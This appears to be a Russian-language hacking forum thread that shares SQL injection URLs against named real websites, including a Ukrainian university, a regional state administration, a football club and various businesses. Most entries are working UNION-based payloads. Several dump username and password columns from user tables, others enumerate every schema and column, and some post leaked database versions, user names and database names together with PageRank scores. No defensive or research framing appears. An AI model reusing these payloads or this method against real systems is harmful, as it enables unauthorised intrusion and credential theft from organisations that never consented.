SQL Инъекции

ANPED Серверный Устойчивый Альянс

Code:

http://www.anped.org/index.php?part=-112%27+union+select+1,2,3,4,5,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28anped.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,7,8,9,10+--+

 

pr=8

================================
pr=5

================================
pr=4

================================

 

Code:

http://www.hkyongnuo.com/e-detail.php?ID=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+--+

Харьковский Национальный Университет им. В.Н.Каразина

Code:

http://www.univer.kharkov.ua/en/general/univer_today/photos?cat=-411+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+&year=2666

 

pr=6

================================

================================

================================

 

http://bolshevik-bowling.com.ua/info.php?id=-2+union+select+1,2,@@version

 

Интересная находка (по крайней мере, для меня )

Нашел инъекцию на http://www.gfvastgoed.be/detail.php?id=840868.

Как blind,все крутится:

Подбираем количество столбцов......их аж 407

 

Ололо

Code:

http://www.gfvastgoed.be/detail.php?id=-1/**/union(select(0),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat(user(),0x3A,database(),0x3A,version(),0x3A),29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406)

P.S Блокнотом заменяем все пробелы на ничего.

 

pr=3

================================
pr=2

================================
pr=2

================================

 

http://www.pie-mag.com/no_cache/event-details.html?event_id=59+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79+--+

 

================================
pr=3

================================
pr=3 тиц=10

================================

 

================================

================================

================================

 

Code:

http://www.maglain.ru/news.php?nid=-121+union+select+1,2,3,concat_ws(0x3a,version(),user(),database(),0x4861636b6564206279205365706f),5 ,6,7,8,9,10,  1  1 ,12,13,14,15,1 6,17,18,19,20,21--

 

Code:

http://www.arteventjewelry.com/trade.php?id=-4+union+select+@@version

 

Code:

http://www.gymnasium100.nl/productinfo.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,0x4861636b6564206279205365706f,8,9,10,11,12--

 

Черкасская Областная Государственная Администрация.

Code:

http://www.oda.ck.ua/index.php?lng=ukr&section=&article=[COLOR=Red]-183+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,4+--+[/COLOR]

 

PHP:

http://www.madminutemusic.com/artist.php?artist_id=-35+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--

PR: 4
version: 5.1.66
user: mondomix103@localhost
database: mondomix103_madminute

 

Code:

http://www.blackberryrecords.com/artist.php?artist_id=-177+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4--

PR: 3
version: 5.5.33-log
user: blackbj3_admin@localhost
database: blackbj3_brecords_blackberry

Code:

http://gailseverngallery.com/index.php/component/gailsevern/view/artist/id/-732+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12--

PR: 4
version: 5.1.54
user: gailsevern@localhost
database: gailsevern_joom

Code:

http://www.gallerish.com/artist.php?ArtistID=-856/**/union/**/select/**/concat(version(),0x3a,user(),0x3a,database())--

PR: 2
version: 5.5.33-log
user: galleri8_conn001@localhost
database: galleri8_ArtShowcase

 

FLOATING LIFE Покупка, продажа и аренда яхт!

Code:

http://www.floatinglife.com/management.php?ID=[COLOR=Red]-29+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28floatinglife.utenti%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,user,0x3a,pwd%29%29%29%29x%29,3,4+--+[/COLOR]

Code:

http://www.teklat.lv/c.php?id=2&id2=75%27+union+select+1,2,3,4,5,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,7,8,9,10+--+

Code:

http://www.dfki.de/lt/card.php?id=-94+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,1,61,7,18,19,20,21,22,23,24,25,26,27,28,29+--+

Версия: 4.0.21-Max

Code:

http://www.biprint.ru/index.php?area=soft&parent=-39+union+select+version%28%29+--+

Версия: 5.1.56-log (Стоит фильтр на вывод БД)

Code:

http://www.bionets.eu/index.php?area=-17+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28bionets.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,passwd%29%29%29%29x%29+--+

ФК "Химки"

Code:

http://www.fckhimki.ru/modules/content/index.php?current_id=-49+union+select+1,2,3,4,5,6,7,8,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,10,11,12,13+--+

РОСГИДРОМЕТ

Code:

http://caspianmonitoring.ru/index.php?id=-1+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8+--+

5.0.96-community

Code:

http://www.violinlab.com/FAQ/index.php?id=1+/*!union*/+/*!select*/+1,2,version%28%29,4+--+

4.0.27-log

Code:

http://www.obruch.ru/index.php?id=8&n=77&r=6+union+select+1,2,3,4,version%28%29+--+

 

Code:

http://www.africasia.com/services/opinions/opinions.php?ID=-2822%20union%20select%201,2,concat_ws(0x3a,version(),user(),database(),0x4861636b6564206279205365706f),4,5,6,7,8,9,10--

Code:

http://www.sourceisrael.com/read.php?id=-104+union+select+1,group_concat(concat_ws(0x3a,version(),user(),database(),0x4861636b6564206279205365706f)),3,4,5,6,7,8,9,10,11+--+

Code:

http://www.lapedale.fr/pages/produit.php?id=-1133+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database(),0x4861636b6564206279205365706f),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--

 

Code:

http://www.wf-baits[dot]com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&cmd=add&cid=20&sid=0.6886686905513422&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,CONCAT_ws(CHAR(32,58,32),user(),version(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23

Tyc 610 Pr 1